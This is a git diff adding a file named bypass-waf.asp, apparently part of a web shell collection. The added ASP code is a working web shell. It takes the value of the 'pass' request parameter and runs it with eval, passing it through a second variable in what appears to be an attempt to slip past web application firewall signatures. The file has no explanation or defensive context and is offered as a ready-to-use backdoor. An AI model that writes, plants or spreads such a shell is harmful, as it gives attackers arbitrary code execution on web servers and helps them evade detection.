diff --git a/asp/bypass-waf.asp b/asp/bypass-waf.asp new file mode 100644 index 0000000..67dd8bb --- /dev/null +++ b/asp/bypass-waf.asp @@ -0,0 +1,9 @@ + +<% +dim x1,x2 +x1 = request("pass") +x2 = x1 +eval x2 +%> + + \ No newline at end of file